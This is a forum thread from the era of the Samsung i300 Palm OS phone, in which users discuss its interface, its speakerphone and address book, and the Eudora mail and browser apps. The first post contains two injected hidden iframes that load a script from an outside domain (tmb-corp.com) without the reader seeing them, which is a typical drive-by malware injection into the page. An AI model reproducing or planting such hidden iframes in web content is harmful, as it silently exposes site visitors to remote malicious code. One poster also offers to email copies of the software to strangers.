+ Reply to Thread

AaaaggggHHH! No eudora Browser in i-300!

i absolutely love my 6035 beucase I'm able to surf the web, check my pop3 email, and ability to use custom ringer tones.

But love style to. I work for Radio Shack and my coworker have the new Sanyo 6000 and the tp 5200. My big brick of a phone doens't have that cool factor.

The new i-300 seems to be cool. The color screen is only nice becuase of the improved clarity. Especailly when compared to the horrible reverse backlgihting inherent in the 6035. ( i use lgiht hack but its still doen't work all of the time) We just got the phone is the store and i thgouht about selling my 6035 to get the new i-300.

I haven't acviated yet because it still belongs to the store, but i can't fgirue out a few things.

1) Where/ How do I add DTMF tones??? Becuase the i-300 is more of a Palm than a phone, it doesn't have the normal phone options screen.

2) Where is the addy book??? is it that little icon on the bottom.. I hope not cuase that pretty annoying! i had a tp 3000 and I loved it because I hit the right arrow button and it went into my addy book. The worst feature of the 6035 is definetly it's lack of a good search feature. I hate using the find button typing a few letters. Then I 'm required to use the stupid scrool wheel to select find. Very intuvitive. In my car impossible to work. Kyocera really drop the ball of that feature.

3) Hidden features of the Volume keys on the side- I notice when using the Addy book you can use the volume buttons to scroll up and down. The vocie dial button to select numbers. But I was disappointed again once you go into the Main application screen. Another coworker of mine owns one of the new B&W Models of the Sony CLie. the Rolling selector on the Sony's allows full one handed operation because when you spin the dial, you scroll through the apps!!!! Depress the scroll wheel, and you launch the app. The Volume key/s Vocie dial buttons don't do this in the i-300!!!

4) Where in the heck is the Speakerphone settings? I haven't played with it enough and I have opened up the manual, but during the phone the speakerphone icon pops up. And little darn icon that Samsung expects people to hit when using a stylus, Heck half the time I can't find my stlyus! After I finish the call the phone reverts the speakerphone back to the lowest setting??? Annoying.

5) Those little icons on the bottom. I guess Samsung didn't do much R&D in this area because they should have made those button at least finger sized!

6) Has any i-300 user d/l the eudura mail/ web app to see what happens??? If I can't browse the net / check my pop3 email. I'm not switching over to the i-300. I use those features daily. When I driving to work in the morining. I set the phone it it's car cradle and let it download all of my new email to read during the day. I surf the net whenever I'm bored!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

2.) You can access the address book by pressing the hard button with the picture of the phone on it.

5.) I agree the little icons at the botton in the phone app aren't the best but I have no trouble pushing them with my fingernail.

6.) Having voice, data (email/internet), and an organizer all in one device is what the I300 is all about so of course the I300 can do email/internet. I doubt many people would be willing to pay $500 if it couldn't do data. The Eudora email client works perfectly with the I300. Haven't tried out the Eudora browser because I have no need to with Blazer (the best Palm OS web browser out there). Version 1.1 is available on the cd or you can download 2.0 (a definite upgrade) by logging into your online account at www.sprintpcs.com and clicking on the provided link.

Blazer Download Help

I went to the sprint home page and attempted to download the blazer software. I chose PalmOS and then was asked to select Kyocera activate or Kyocera manual. Am I doing the right thing??

Thanks

Peter
    Peter

I installed both Eudora Mail and Eudora Web. Eudora web is great (if you don't care about graphics) because it's fast and light and doesn't require a proxy. (Graphics are the main reason you need a proxy server, to coerce the graphics down to a usable size.) This makes it a much better performer than Blazer or ProxiWeb or whatever.

Eudora Mail is a superb program in terms of functionality - sophisticated filtering and truncation settings, multiple accounts... really just perfect. But it's crashed badly on me a couple of times, causing the database to become corrupt. Even a reset doesn't work, you have to uninstall and reinstall Eudora mail to fix it. Because of this, I can't trust it when traveling. Your mileage may vary, I'd still suggest trying it. Just don't have too much faith in it at first -- see if it remains stable for you for a few weeks before putting a lot of trust in it.

Originally posted by Harangutan
    But it's crashed badly on me a couple of times, causing the database to become corrupt. Even a reset doesn't work
    I've been running Eudora email client for a few weeks without any problems. I uninstalled eudora web since I don't surf too much and liked the blazer's graphics. I did have problems getting my ISP's SMTP server authentication to work with eudora, though (could not negotiate a security protocol)...

I wonder if your eudora email client prob's may be due to conflicts with other apps...? I'm very happy with how Eudora works on my i300.

Eudora software help

Ive got the Eudora email/web Palm software.
    If anybody wants it...
    email me at eclipsingtechnologies@yahoo.com and I'll email you the program... its only 1.7mb

I use it to get/receive my POP mail and it works great! Ive havent used the Eudora Web Browser enough to give any quality feedback.

Both the Eudora mail and web browser work quite well. As I have pointed out in an other post, if you plan to connect your web browser to any other server that are NOT on the internet, Browser will not work. Browser uses a proxy server that can only contact servers on the Internet. If you plan to connect to say an Intranet, you probably need to have another browser (besides Blazer) on your i300.
    Carl